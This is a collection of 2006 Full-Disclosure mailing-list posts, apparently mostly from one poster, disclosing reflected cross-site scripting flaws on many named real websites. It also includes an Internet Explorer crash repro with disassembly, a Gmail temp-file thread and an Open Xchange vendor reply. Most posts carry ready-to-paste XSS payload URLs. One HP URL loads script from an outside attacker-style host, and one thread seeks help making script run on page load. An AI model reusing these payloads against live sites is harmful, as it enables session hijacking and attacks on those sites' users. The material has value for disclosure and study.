On 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:
Why do you need it ?You already discovered xss, the rest of "job" is just matter of technique.I think majority of xss submitters here could do it by various means.M$ is lost in its own complexity of how to do simple things.
If you could ever give me reasonable answer for why do you need this $hit - I could give you the "rest", like others could.I doubt you actually tried getting js executed on page load (for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.Greets,Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] micosoft.com xss

[Thomas Pollet]

Hello,I have found that microsoft.com fails to filter html properly on some pages.

http://support.microsoft.com/newsgroups/default.aspx?lang=en&cr=US&dg=microsoft.public.ccf&sloc=us');alert('xssthis causes _javascript_ to be executed when a user clicks the help link.Someone knows how to get js executed on page load?
greets,Thomas

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] security vendor xss

[Thomas Pollet]

Hello,several security vendors still don't know how to filter html in their custom search engines.
http://cybertrust.com/cgi-bin/htsearch?words=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://www.pandasoftware.com/com/virus_info/encyclopedia/results.aspx?termino=
 google.com>&tipoBusqueda=vi
http://fr.trendmicro-europe.com/search/?entity=enterprise&master=true&searchword=%3Cscript%3Ealert%281%29%3C%2Fscript%3EGreets,Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] bugs

[Thomas Pollet]

Hi,I have found ie crashing when refreshing an iframe containing an xml file with xsl stylesheet (takes a while to crash).I used this html:-

function refresh() {
   frames[0].window.location.reload();
  setTimeout("refresh();", 20);
}


refresh();
-- input.xml is calling an xsl stylesheet (cfr. attachment)
--w2k:msxml3.dll:69B76B61 mov     eax, [esi]msxml3.dll
:69B76B63 mov     ecx, esimsxml3.dll:69B76B65 call    dword ptr [eax+48h]with esi=0MSHTML.DLL:637840E8 test    byte ptr [eax+44Dh], 20hwith eax=0xp:msxml3.dll:74992156   8B43 14  MOV EAX,DWORD PTR DS:[EBX+14]
EBX=0seem like nullpointer derefs.Weird thing it crashes on different addies, somebody can shed some light on why is this?obligatory xss:

http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=All secure search, lol?

oreilly.com: search powered by 

http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=
http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0


http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&source=cnn&url=""

http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir


http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0


http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url="">

http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0
http://us.mcafee.com/virusInfo/ : enter following in virus search: (use POST form for exploit)
">alert(1)cheers,Thomas





Bugs Bunny
03/21/1970
31
4895 Wabbit Hole Road
865-111-



Daisy Duck
08/09/1949
51
748 Golden Pond
865-222-



Minnie Mouse
04/13/1977
24
4064 Cheese Factory Blvd
865-333-



Pluto
07/04/1979
21
414 Dog Lane
865-333-



Porky Pig
11/30/1956
44
555 Mud Pit Pike
865-444-



Road Runner
01/19/1953
48
135 Desert View Street
none




http://www.w3.org/1999/XSL/Transform"; version="1.0">





NAME: 

DOB: 

AGE: 

ADDRESS: 

PHONE: 






 
























































___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail emails issue

[Thomas Pollet]

He means a temp folder on the gmail server.I verified an attachment being available even after being signed out.On 04/08/06, Stan Bubrouski <
[EMAIL PROTECTED]> wrote:I'm reading your message in gmail and there is nothing in my temp
folder... not that i'd expect there to be.  Gmail can't just createfiles on your computer without your permission, it it can yoursettings are wrong or your browser is broken.  In other words if yourgmail mails are ending up in your temp folder your web browser is
putting them there...  what browser are you using BTW.  I'm usingfirefox and it doesn't store my mails in the temp folder under my NTaccount.-sbOn 8/4/06, 6ackpace <
[EMAIL PROTECTED]> wrote:>> Hi All,>> Gmail stores mails in Temp folder for faster access.but i have observer it> fails to remove mail from   the temp files after the session is ended.
>> any user who has access physical access to the system can read mail and> contact information of the Gmail user.>> Discloses information which is private and confidential?>
> thank you>> ratna>> ___> Full-Disclosure - We believe in it.> Charter:> 
http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/>>___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Open Xchange XSS

[Thomas Pollet]

Open Xchange webmail (<=0.8.1-6) suffers from xss.

http://mirror.open-xchange.org/ox/EN/community/



Vendor response:

For the commercial OX you don't need this as there exists additional security

options where you will not able to use this session. It's a general problem for

all web based mailers and some of them try to filter such scripts, some of them

do not and show a warning instead that the document may contains "dangerous

content". But you will never be able to filter all possible scriptings.

Displaying HTML content is ALWAYS an unsecure option, so it is recommended to

disable "Inline HTML" at the WebMail options. Anyway, I will check if I can make

some basic filter to get most of such tags.



Cheers,

Thomas

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/